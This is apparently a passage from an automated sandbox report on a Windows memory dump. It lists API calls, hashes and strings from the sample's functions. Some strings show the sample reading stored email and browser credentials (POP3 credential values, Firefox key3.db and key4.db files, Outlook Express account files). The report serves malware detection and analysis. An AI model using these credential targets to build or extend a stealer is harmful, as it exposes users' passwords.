                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2126104762-0
                                                                                                                                                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                                                                                                • memcpy.MSVCRT ref: 0044972E
                                                                                                                                                                • memcpy.MSVCRT ref: 0044977B
                                                                                                                                                                • memcpy.MSVCRT ref: 004497F6
                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                                                                                                • memcpy.MSVCRT ref: 00449846
                                                                                                                                                                • memcpy.MSVCRT ref: 00449887
                                                                                                                                                                • memcpy.MSVCRT ref: 004498B8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: gj
                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                • String ID: user_pref("
                                                                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                                                                • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76DC0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76DC0A60), ref: 00406D4D
                                                                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                                                                • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,750DE430,?), ref: 004081B9
                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                • API String ID: 524865279-2190619648
                                                                                                                                                                • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                • String ID: key3.db$key4.db
                                                                                                                                                                • API String ID: 581844971-3557030128
                                                                                                                                                                • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                                                                • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                                                                • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                • API String ID: 125969286-791839006
                                                                                                                                                                • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                • String ID: ACD
                                                                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                                                                • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                                                                • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                                                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                • API String ID: 2221118986-3608744896
                                                                                                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
